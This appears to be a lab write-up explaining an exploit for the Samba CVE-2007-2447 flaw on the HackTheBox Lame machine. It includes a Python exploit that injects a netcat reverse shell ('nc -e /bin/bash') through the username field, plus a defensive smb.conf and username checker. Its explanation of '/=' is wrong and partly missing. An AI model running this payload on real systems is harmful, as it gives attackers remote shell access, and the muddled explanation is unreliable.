
0xConstant/CVE-2007-2447


ExploitDev Journey #6 | CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username map script' Command Execution

Original Exploit: https://www.exploit-db.com/exploits/16320

Exploit name: Samba username map script RCE
CVE: 2007-2447
Lab: Lame - HackTheBox

Description

There is a vulnerability in Samba versions below 3.0.25 that allows an attacker to execute system commands by sending a malformed username to the SMB server.


How it works

Here is an example of using the nohup command to create a directory:

In programming, /= is the divide-and-assign operator, usually used in loops. But why do we need it here?
It is used to divide the domain field and the username field when sending the request; a better explanation can be found here. We use the username field to open a netcat connection and connect to our server.


Writing the exploit

Writing the exploit is very easy because there is already an SMB client library available for Python (install the python3-samba package), so all you have to do is use it like this:

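```python
import sys

# Assumption: SMBConnection is pysmb's class (module smb.SMBConnection); its
# constructor takes the four arguments discussed below.
from smb.SMBConnection import SMBConnection

# lhost/lport (listener) and rhost/rport (target) are set elsewhere in the script.
username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username, '', '', '')

try:
    print("Sending payload")
    conn.connect(rhost, rport, timeout=10)
except Exception as e:
    sys.exit(e)
```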

Let's understand how SMBConnection works. I provided the username, but what are the three other empty strings?
Those three arguments are password, my_name and remote_name.

To make the exploit easier to read, we can write the arguments out explicitly along with their values, although the values for the arguments after username are not required:

```python
conn = SMBConnection(username=username, password='', my_name='', remote_name='')
```

The following part is easier to understand: we use the instance of the SMBConnection class to make a connection, providing the target's IP, the port and a timeout in seconds:

```python
conn.connect(rhost, rport, timeout=10)
```
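Seen from the defending side, the same bug gives three things to check: whether `username map script` is set in smb.conf, whether the Samba version falls in the range named in this page's title, and whether logged usernames carry shell metacharacters. The following is an added example, not code from this repository; the sample config, script path and usernames are constructed, and the metacharacter set beyond the backtick is an assumption.

```python
import re

# Backtick carries the command in the payload above; the other shell
# metacharacters are an assumption covering substitution and chaining forms.
SHELL_META = re.compile(r"[`;|&<>\n]|\$\(|\$\{")

def suspicious_username(name: str) -> bool:
    """True if a logged SMB username contains shell metacharacters."""
    return bool(SHELL_META.search(name))

def username_map_script(conf_text: str):
    """Value of 'username map script' in smb.conf text, or None if unset.
    Parameter names ignore case and whitespace; '#' and ';' start comments."""
    value = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;[" or "=" not in line:
            continue
        key, _, val = line.partition("=")
        if "".join(key.lower().split()) == "usernamemapscript":
            value = val.strip() or None  # assumption: last assignment wins
    return value

def in_affected_range(version: str) -> bool:
    """Range from this page's title: 3.0.20 up to the 3.0.25 release candidates."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(.*)", version.strip())
    if not m:
        return False
    v = tuple(int(x) for x in m.group(1, 2, 3))
    prerelease = m.group(4).lower().startswith(("rc", "pre"))
    return (3, 0, 20) <= v < (3, 0, 25) or (v == (3, 0, 25) and prerelease)

# Constructed sample input (not from the original page).
SAMPLE_CONF = """[global]
   workgroup = LAB
   ; Username Map Script = /bin/false
   username  map script = /etc/samba/scripts/mapusers.sh
"""
SAMPLE_USERNAMES = ["alice", "LAB\\bob", "svc-backup$", "/=`nohup CMD`"]

if __name__ == "__main__":
    print("username map script:", username_map_script(SAMPLE_CONF))
    print("3.0.20-Debian affected:", in_affected_range("3.0.20-Debian"))
    for name in SAMPLE_USERNAMES:
        if suspicious_username(name):
            print("suspicious username:", repr(name))
```

A trailing `$` on a machine account and the backslash in `DOMAIN\user` are deliberately not flagged, so the check stays quiet on ordinary account names.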

Final thoughts

In this exploit development session you learned about creating an SMB client and connecting to an SMB server. You also learned about Linux commands such as nohup, which you can experiment with later. You learned about connecting to your attacker machine from the victim machine using netcat, which might come in useful in your exploit development journey.
